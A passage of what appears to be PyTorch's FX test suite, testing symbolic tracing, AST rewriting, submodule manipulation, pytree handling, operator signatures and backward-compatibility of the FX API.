def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
result = super(type(self), self).__call__(*args)
self.calling = False
return result
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test that the custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
rn = torchvision_models.resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
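# Foo is registered as a pytree node above: it flattens to its two fields and
# is rebuilt from them, and fx_pytree gets a matching flatten spec so traced
# code can unflatten placeholder arguments back into Foo instances.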
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature-flagged;
# enable it in testing but not by default.
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
# Sorted and one entry on each line to minimize merge conflicts.
known_no_schema = {'block_diag',
'broadcast_tensors',
'cdist',
'contiguous',
'dstack',
'einsum',
'expand',
'expand_as',
'fill_',
'hstack',
'igamma',
'igammac',
'linalg.multi_dot',
'lu',
'norm',
'polygamma',
'special.polygamma',
'repeat',
'reshape_as',
'resize_',
'resize_as_',
'special.zeta',
'stack',
'to_sparse',
'view',
'view_as',
'nn.functional.hardshrink',
'vstack',
'where',
'zero_',
'__getitem__',
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rmod__',
'__rpow__',
'__rand__',
'__ror__',
'__rxor__',
'__rmatmul__'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema or "nn.functional" in op.name
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations while tracing is feature-flagged;
# enable it in testing but not by default.
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
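# e.g. per the note above, an unsubscripted Dict on Python 3.8 may expose its
# TypeVars through __args__; dropping them here keeps it rendered as a bare
# 'Dict' rather than 'Dict[~KT, ~VT]'.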
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}. '
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature-flagged;
# enable it in testing but not by default.
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
